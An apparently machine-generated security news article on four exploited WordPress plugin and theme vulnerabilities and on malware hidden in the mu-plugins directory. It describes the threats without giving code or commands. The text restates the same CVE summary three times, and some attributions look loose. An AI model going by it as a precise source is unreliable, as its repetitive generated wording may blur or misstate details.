Ethical Hacking News
A recent report from Patchstack has highlighted a concerning trend among threat actors, who have been exploiting four different security vulnerabilities in WordPress since the start of the year. These vulnerabilities pose a significant risk to WordPress sites, as they can be used to inject malicious code and compromise user data.
The first vulnerability identified is CVE-2024-27956, which poses an unauthenticated arbitrary SQL execution risk due to the Automatic Plugin - AI content generator and auto poster plugin. Next, there is CVE-2024-25600, a remote code execution (RCE) vulnerability in the Bricks theme that has been found by Patchstack. The RCE weakness enables attackers to execute arbitrary code on the WordPress site remotely.
Furthermore, CVE-2024-8353 is another unauthenticated PHP object injection vulnerability in GiveWP plugin that has been identified by Patchstack. This weakness allows attackers to inject malicious code into the WordPress site's PHP environment, which can be used to execute arbitrary commands or inject malware.
Lastly, there is CVE-2024-4345, an arbitrary file upload vulnerability in Startklar Elementor Addons for WordPress. The file upload vulnerability could potentially allow attackers to inject malicious files onto the site, including executables that can be run by the server's PHP environment.
Sucuri researcher Puja Srivastava has highlighted the potential impact of these vulnerabilities on WordPress sites, noting that threat actors are exploiting these weaknesses to stage malware and deliver it to vulnerable sites. By staying informed and taking proactive steps to secure their sites, users can reduce the risk of falling victim to these types of attacks.
To learn more about these vulnerabilities and how to protect yourself against them, be sure to check out the full report from Patchstack.
A recent report from Patchstack has identified four security vulnerabilities in WordPress that have been exploited by threat actors since the start of the year.CVE-2024-27956 allows attackers to execute arbitrary SQL queries without authentication or authorization, giving them control over the database.CVE-2024-25600 enables remote code execution (RCE) vulnerabilities in the Bricks theme, allowing attackers to inject malicious payloads into the site.CVE-2024-8353 is an unauthenticated PHP object injection vulnerability in GiveWP plugin that allows attackers to inject malicious code into the WordPress site's PHP environment.CVE-2024-4345 is an arbitrary file upload vulnerability in Startklar Elementor Addons for WordPress, allowing attackers to inject malicious files onto the site.
A recent report from Patchstack has highlighted a concerning trend among threat actors, who have been exploiting four different security vulnerabilities in WordPress since the start of the year. These vulnerabilities, which include a severe SQL injection flaw and remote code execution weaknesses, have allowed attackers to inject malicious code into WordPress sites, rendering them vulnerable to various types of attacks.
The first vulnerability identified by Patchstack is CVE-2024-27956, which poses an unauthenticated arbitrary SQL execution risk due to the Automatic Plugin - AI content generator and auto poster plugin. This vulnerability allows attackers to execute SQL queries without needing authentication or authorization, effectively giving them control over the database.
Next, there is CVE-2024-25600, a remote code execution (RCE) vulnerability in the Bricks theme that has been found by Patchstack. The RCE weakness enables attackers to execute arbitrary code on the WordPress site remotely, without needing authentication or access to the underlying server. This could potentially allow attackers to inject malicious payloads into the site.
Furthermore, CVE-2024-8353 is another unauthenticated PHP object injection vulnerability in GiveWP plugin that has been identified by Patchstack. This weakness allows attackers to inject malicious code into the WordPress site's PHP environment, which can be used to execute arbitrary commands or inject malware.
Lastly, there is CVE-2024-4345, an arbitrary file upload vulnerability in Startklar Elementor Addons for WordPress. The file upload vulnerability could potentially allow attackers to inject malicious files onto the site, including executables that can be run by the server's PHP environment.
Sucuri researcher Puja Srivastava has highlighted the potential impact of these vulnerabilities on WordPress sites. According to Srivastava, threat actors are exploiting these weaknesses to stage malware and deliver it to vulnerable sites, which could potentially lead to a range of attacks including data theft, ransomware infections, and other types of malicious activity.
"This approach represents a concerning trend, as the mu-plugins (Must-Use plugins) are not listed in the standard WordPress plugin interface, making them less noticeable and easier for users to ignore during routine security checks," Srivastava said in an analysis. "The script includes a function that identifies whether the current visitor is a bot, which allows the script to exclude search engine crawlers and prevent them from detecting the redirection behavior."
The mu-plugins directory in WordPress sites is a special area that contains plugins automatically executed by WordPress without needing explicit activation via the admin dashboard. This means that threat actors are able to inject malicious code into this directory, making it difficult for users to detect and remove the malware.
In an analysis of infected WordPress sites, Sucuri discovered three different kinds of rogue PHP code in the mu-plugins directory - "wp-content/mu-plugins/redirect.php," which redirects site visitors to an external malicious website; "wp-content/mu-plugins/index.php," which offers web shell-like functionality and allows attackers to execute arbitrary code by downloading a remote PHP script hosted on GitHub; and "wp-content/mu-plugins/custom-js-loader.php," which injects unwanted spam onto the infected website.
The "redirect.php" script masquerades as a web browser update, deceiving victims into installing malware that can steal data or drop additional payloads. This type of social engineering tactic is becoming increasingly common among threat actors, who are using various methods to trick website visitors into running malicious code on their computers.
Additionally, hacked WordPress sites have been used as staging grounds for deploying malicious JavaScript and skimming financial information entered by users on checkout pages.
While the exact circumstances surrounding the breaches of these vulnerable WordPress sites are not yet known, the usual suspects include vulnerable plugins or themes, compromised admin credentials, and server misconfigurations.
In light of these findings, it is essential that WordPress site owners take proactive steps to mitigate the risks posed by these vulnerabilities. This includes keeping plugins and themes up to date, routinely auditing code for the presence of malware, enforcing strong passwords, and deploying a web application firewall to prevent malicious requests and prevent code injections.
Furthermore, users should exercise extreme caution when interacting with their WordPress sites, especially if they have received any unusual notifications or have noticed strange behavior on their website. By being vigilant and proactive about security, individuals can reduce the risk of falling victim to these types of attacks.
Ultimately, this report highlights the importance of ongoing vigilance in the face of evolving cyber threats. As threat actors continue to adapt and exploit new vulnerabilities, it is essential that we remain informed and take steps to protect ourselves against these types of attacks.
Related Information:
https://www.ethicalhackingnews.com/articles/New-Vulnerabilities-Exposed-Threat-Actors-Exploit-Four-Security-Weaknesses-in-WordPress-ehn.shtml
https://thehackernews.com/2025/03/hackers-exploit-wordpress-mu-plugins-to.html
https://nvd.nist.gov/vuln/detail/CVE-2024-27956
https://www.cvedetails.com/cve/CVE-2024-27956/
https://nvd.nist.gov/vuln/detail/CVE-2024-25600
https://www.cvedetails.com/cve/CVE-2024-25600/
https://nvd.nist.gov/vuln/detail/CVE-2024-8353
https://www.cvedetails.com/cve/CVE-2024-8353/
https://nvd.nist.gov/vuln/detail/CVE-2024-4345
https://www.cvedetails.com/cve/CVE-2024-4345/
Published: Mon Mar 31 09:18:24 2025 by llama3.2 3B Q4_K_M
